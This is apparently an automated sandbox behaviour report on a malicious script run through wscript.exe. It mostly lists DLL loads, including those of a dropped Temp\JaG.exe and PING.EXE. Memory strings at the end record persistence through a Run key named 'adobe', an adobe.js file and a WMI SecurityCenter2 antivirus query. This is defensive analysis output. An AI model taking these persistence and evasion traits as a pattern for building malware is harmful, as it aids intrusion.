Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dlnashext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wpdshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: napinsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: pnrpnsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshbth.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: nlaapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winrnr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: dwrite.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: windowscodecs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll | |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll | |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll | |
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll | |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rwinmgmts:\\localhost\root\securitycenter2pac/h | memstr_9d36048c-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe". | memstr_5669bfc1-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".2 | memstr_cb3ea9b6-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".$ | memstr_f7101567-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\system tools\desktop.ini | memstr_46f389bb-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: common start menu | memstr_57a88e6f-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :\adobe.js | memstr_c7555182-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata\roaming | memstr_61789d7a-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system | memstr_fa6f65bd-5 |
